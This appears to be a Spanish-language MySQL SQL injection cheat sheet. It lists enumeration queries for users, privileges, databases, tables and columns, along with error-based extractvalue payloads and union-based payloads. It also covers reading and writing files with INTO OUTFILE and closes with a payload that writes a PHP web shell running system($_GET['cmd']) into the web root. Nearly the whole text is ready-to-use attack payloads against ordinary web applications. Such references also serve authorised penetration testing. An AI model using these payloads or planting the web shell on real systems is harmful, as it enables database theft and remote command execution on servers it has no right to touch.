# Usuario actualSELECT current_user()SELECT system_user()SELECT user()# Listado de usuariosSELECT user FROM mysql.user
Privilegios
# Privilegios SELECT grantee,privilege_type FROM information_schema.user_privileges# Privilegio de superusuario (Y = Yes)SELECT super_priv FROM mysql.user WHERE user="<user>"
Bases de datos
# Nombre de base de datos actualSELECT database()# Listado de base de datosSHOW databasesSELECT table_schema FROM information_schema.tables GROUP BY table_schema
Tablas
# Tablas de base de datos actualSHOW tables# Tablas de una base de datosSELECT table_schema, table_name FROM information_schema.tables WHERE table_schema='<database>'
Columnas
# Columnas de una tablaSELECT column_name, data_type from information_schema.columns WHERE table_schema='<database>' AND table_name='<table>'
Datos
# Datos de una tablaSELECT * FROM <database>.<table>
# Nombre de base de datos actualextractvalue('',concat('>',database()))# Listado de base de datosextractvalue('',concat('>',( SELECT group_concat(table_schema) FROM ( SELECT table_schema FROM information_schema.tables GROUP BY table_schema) AS foo) ))
Tablas
extractvalue('',concat('>',( SELECT group_concat(table_name) FROM ( SELECT table_name from information_schema.tables WHERE table_schema='<database>') AS foo) ))extractvalue('',concat('>',( SELECT group_concat(table_name) FROM ( SELECT table_name from information_schema.tables WHERE table_schema='<database>' AND table_name NOT IN ('<table>')) AS foo) ))# Ir incrementando el valor de offsetextractvalue('',concat('>',( SELECT group_concat(table_name) FROM ( SELECT table_name from information_schema.tables WHERE table_schema='<database>'limit1 offset 1)AS foo) ))
Columnas
extractvalue('',concat('>',( SELECT group_concat(column_name) FROM ( SELECT column_name FROM information_schema.columns WHERE table_schema='<database>' AND table_name='<table>') AS foo) ))extractvalue('',concat('>',( SELECT group_concat(column_name) FROM ( SELECT column_name FROM information_schema.columns WHERE table_schema='<database>' AND table_name='<table>' AND column_name NOT IN ('<column>')) AS foo) ))
Datos
extractvalue('',concat('>',(SELECT substring(<column>,1,32) FROM <table>limit1 offset 0)))
Union-based SQLi
Bases de datos
# Nombre de base de datos actualUNION SELECT 1,database(),3,4-- -# Listado de base de datosUNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- -
Tablas
UNION SELECT 1,table_schema,table_name,4 FROM information_schema.tables WHERE table_schema='<database>'-- -
Columnas
UNION SELECT 1,column_name,data_type,2 FROM information_schema.columns WHERE table_schema='<database>' AND table_name='<table>'-- -
Datos
UNION SELECT 1,columna1,columna2,4 FROM <database>.<table>-- -
Obtener información dentro de una sola columna
UNION SELECT CONCAT(columna1, ' - ', columna2, ' - ', columna3) FROM tabla1-- -UNION SELECT CONCAT_WS(' - ', columna1, columna2, columna3) FROM tabla1-- -
Lectura y escritura de archivos
Para poder leer y escribir archivos se deben cumplir las siguientes condiciones:
El usuario debe tener habilitado el privilegio "FILE".
Valor de la variable global secure_file_priv:
Un valor vacío nos permite leer y escribir en cualquier directorio.
Si se establece un determinado directorio, solo podemos leer y escribir desde la carpeta especificada por la variable.
NULL significa que no podemos leer y escribir en ningún directorio.
Acceso de lectura y escritura a la ubicación en la que queremos leer o escribir el archivo.
Obtener valor de la variable global secure_file_priv.
SELECT @@GLOBAL.secure_file_privSELECT variable_name, variable_value FROM information_schema.global_variables WHERE variable_name="secure_file_priv"UNION SELECT 1,variable_name,variable_value,4 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -
SELECT * FROM <table> INTO OUTFILE '/tmp/file'SELECT 'test' INTO OUTFILE '/tmp/test.txt'UNION SELECT 1,'test',3,4 INTO OUTFILE '/var/www/html/test.txt'-- -
Escritura de web shell.
webshell.php
<?php echosystem($_GET['cmd']); ?>
UNION SELECT "","<?php echo system($_GET['cmd']); ?>","","" INTO OUTFILE '/var/www/html/webshell.php'-- -